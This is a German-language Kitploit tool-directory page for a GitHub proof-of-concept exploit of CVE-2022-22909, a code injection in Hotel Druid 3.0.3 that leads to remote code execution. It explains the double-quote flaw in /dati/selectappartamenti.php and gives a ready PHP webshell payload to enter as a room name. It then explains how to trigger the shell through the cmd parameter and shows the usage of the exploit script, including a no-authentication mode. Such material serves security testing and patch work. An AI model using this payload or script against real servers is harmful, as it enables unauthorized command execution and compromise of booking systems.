Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-22909 — Hotel Druid 3.0.3 – Code-Injection zu Remote-Code-Ausführung | Kitploit
Tools/GitHubGitHub/0z09e/cve-2022-22909
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationPenetrationstestsPayload-Entwicklung
GitHub0z09e/cve-2022-22909

CVE-2022-22909

Hotel Druid 3.0.3 – Code-Injection zu Remote-Code-Ausführung

Repository anzeigen
55vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-22909

Beschreibung

Eine Code-Injection-Sicherheitslücke wurde in der Anwendung Hotel Druid v3.0.3 gefunden, die ein Angreifer ausnutzen könnte, um Remote-Code auf dem Server auszuführen. Für eine erfolgreiche Ausnutzung muss ein Angreifer die Berechtigung haben, einen neuen Raum hinzuzufügen.

Schwachstellenbeschreibung

Die Sicherheitslücke tritt auf, weil Raumnamen in einer Datei namens /dati/selectappartamenti.php mit doppelten Anführungszeichen gespeichert werden.

root@kitploit:~
<?php 
echo "
<option value=\"Room1\">Room1</option>
<option value=\"Room2\">Room2</option>
<option value=\"Room3\">Room3</option>
";
?>

Payload

Um eine erfolgreiche Ausnutzung durchzuführen, fügen Sie einen Raum mit folgendem Payload als Raumname hinzu.

root@kitploit:~
{${system($_REQUEST[cmd])}}

Nachdem Sie einen neuen Raum hinzugefügt haben, gehen Sie zu /dati/selectappartamenti.php und lösen Sie die Webshell aus, indem Sie einen Befehl über den Parameter cmd übergeben.

Verwendung

root@kitploit:~
usage: hotel-druid.py [-h] -t TARGET [-u USERNAME] [-p PASSWORD] [--noauth]

optional arguments:
  -h, --help            zeigt diese Hilfemeldung an und beendet

required arguments:
  -t TARGET, --target TARGET
                        Ziel-URL. Beispiel: http://10.20.30.40/path/to/hoteldruid
  -u USERNAME, --username USERNAME
                        Benutzername
  -p PASSWORD, --password PASSWORD
                        Passwort
  --noauth              Wenn keine Authentifizierung erforderlich ist, um auf das Dashboard zuzugreifen

Beispiel

Wenn die Anwendung keine Authentifizierung hat. Verwenden Sie das Flag --noauth, um keine Authentifizierung durchzuführen.

Wenn der Server die Authentifizierung aktiviert hat, verwenden Sie --username und --password, um die Authentifizierung durchzuführen.

Danksagungen

Forscher und POC-Autor - 0z09e


Tool herunterladen